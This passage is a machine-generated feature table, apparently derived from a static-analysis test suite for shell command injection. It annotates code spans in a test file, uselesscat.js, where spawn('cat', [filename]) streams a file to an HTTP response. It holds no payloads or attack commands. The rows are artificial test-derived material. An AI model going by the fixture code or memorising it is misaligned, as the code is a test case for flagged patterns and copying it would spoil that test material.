cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:1:119:4 | (functi ... );\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:1:119:4 | (functi ... );\\n})() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:1:119:4 | exceptional return of (functi ... );\\n})() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:1:119:4 | exceptional return of (functi ... );\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:1:119:4 | exceptional return of (functi ... );\\n})() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:113:1 | spawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:113:1 | spawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:113:1 | spawn | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:113:1 | spawn | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:113:1 | spawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:113:1 | this | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:113:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:113:1 | this | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:113:1 | this | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:113:1 | this | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:119:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:119:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:119:1 | 'arguments' object of anonymous function | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:119:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:119:1 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:119:1 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:119:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:119:1 | exceptional return of anonymous function | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:119:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:119:1 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:119:1 | functio ... d());\\n} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:119:1 | functio ... d());\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:119:1 | functio ... d());\\n} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:119:1 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:119:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:119:1 | return of anonymous function | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:119:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:2:119:1 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:9:114:11 | cat | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:9:114:11 | cat | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:9:114:11 | cat | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:9:114:11 | cat | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:9:114:11 | cat | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:9:114:38 | cat | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:9:114:38 | cat | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:9:114:38 | cat | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:9:114:38 | cat | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:9:114:38 | cat | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:9:114:38 | cat = s ... ename]) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:9:114:38 | cat = s ... ename]) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:9:114:38 | cat = s ... ename]) | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:9:114:38 | cat = s ... ename]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:9:114:38 | cat = s ... ename]) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:15:114:19 | spawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:15:114:19 | spawn | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:15:114:19 | spawn | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:15:114:19 | spawn | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:15:114:19 | spawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:15:114:38 | exceptional return of spawn(' ... ename]) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:15:114:38 | exceptional return of spawn(' ... ename]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:15:114:38 | exceptional return of spawn(' ... ename]) | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:15:114:38 | exceptional return of spawn(' ... ename]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:15:114:38 | exceptional return of spawn(' ... ename]) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:15:114:38 | spawn(' ... ename]) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:15:114:38 | spawn(' ... ename]) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:15:114:38 | spawn(' ... ename]) | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:15:114:38 | spawn(' ... ename]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:15:114:38 | spawn(' ... ename]) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:21:114:25 | 'cat' | CalleeFlexibleAccessPath | spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:21:114:25 | 'cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:21:114:25 | 'cat' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:21:114:25 | 'cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:21:114:25 | 'cat' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:21:114:25 | 'cat' | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:21:114:25 | 'cat' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:21:114:25 | 'cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:28:114:37 | [filename] | CalleeFlexibleAccessPath | spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:28:114:37 | [filename] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:28:114:37 | [filename] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:28:114:37 | [filename] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:28:114:37 | [filename] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:28:114:37 | [filename] | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:28:114:37 | [filename] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:28:114:37 | [filename] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:29:114:36 | filename | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:29:114:36 | filename | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:29:114:36 | filename | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:29:114:36 | filename | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:29:114:36 | filename | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:29:114:36 | filename | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:29:114:36 | filename | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:29:114:36 | filename | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:29:114:36 | filename | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:29:114:36 | filename | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:115:5 | cat | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:115:5 | cat | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:115:5 | cat | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:115:5 | cat | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:115:5 | cat | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:115:12 | cat.stdout | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:115:12 | cat.stdout | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:115:12 | cat.stdout | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:115:12 | cat.stdout | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:115:12 | cat.stdout | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:115:15 | cat.stdout.on | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:115:15 | cat.stdout.on | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:115:15 | cat.stdout.on | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:115:15 | cat.stdout.on | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:115:15 | cat.stdout.on | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:117:4 | cat.std ... );\\n }) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:117:4 | cat.std ... );\\n }) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:117:4 | cat.std ... );\\n }) | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:117:4 | cat.std ... );\\n }) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:117:4 | cat.std ... );\\n }) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:117:4 | exceptional return of cat.std ... );\\n }) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:117:4 | exceptional return of cat.std ... );\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:117:4 | exceptional return of cat.std ... );\\n }) | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:117:4 | exceptional return of cat.std ... );\\n }) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:117:4 | exceptional return of cat.std ... );\\n }) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:7:115:12 | stdout | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:7:115:12 | stdout | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:7:115:12 | stdout | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:7:115:12 | stdout | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:7:115:12 | stdout | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:14:115:15 | on | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:14:115:15 | on | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:14:115:15 | on | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:14:115:15 | on | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:14:115:15 | on | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:17:115:22 | 'data' | CalleeFlexibleAccessPath | cat.stdout.on | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:17:115:22 | 'data' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:17:115:22 | 'data' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:17:115:22 | 'data' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:17:115:22 | 'data' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:17:115:22 | 'data' | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:17:115:22 | 'data' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:17:115:22 | 'data' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | 'arguments' object of anonymous function | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | (data) ... a);\\n } | CalleeFlexibleAccessPath | cat.stdout.on | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | (data) ... a);\\n } | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | (data) ... a);\\n } | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | (data) ... a);\\n } | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | (data) ... a);\\n } | contextSurroundingFunctionParameters | ()\n(data) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | (data) ... a);\\n } | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | (data) ... a);\\n } | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | (data) ... a);\\n } | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | exceptional return of anonymous function | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | return of anonymous function | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:25:117:3 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:26:115:29 | data | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:26:115:29 | data | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:26:115:29 | data | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:26:115:29 | data | contextSurroundingFunctionParameters | ()\n(data) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:26:115:29 | data | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:26:115:29 | data | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:26:115:29 | data | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:26:115:29 | data | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:26:115:29 | data | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:26:115:29 | data | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:7 | res | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:7 | res | contextSurroundingFunctionParameters | ()\n(data) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:7 | res | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:7 | res | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:7 | res | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:13 | res.write | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:13 | res.write | contextSurroundingFunctionParameters | ()\n(data) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:13 | res.write | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:13 | res.write | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:13 | res.write | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:19 | exceptional return of res.write(data) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:19 | exceptional return of res.write(data) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:19 | exceptional return of res.write(data) | enclosingFunctionBody | cat spawn cat filename cat stdout on data data res write data cat stdout on end res end | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:19 | exceptional return of res.write(data) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:19 | exceptional return of res.write(data) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:19 | res.write(data) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:19 | res.write(data) | contextSurroundingFunctionParameters | ()\n(data) | 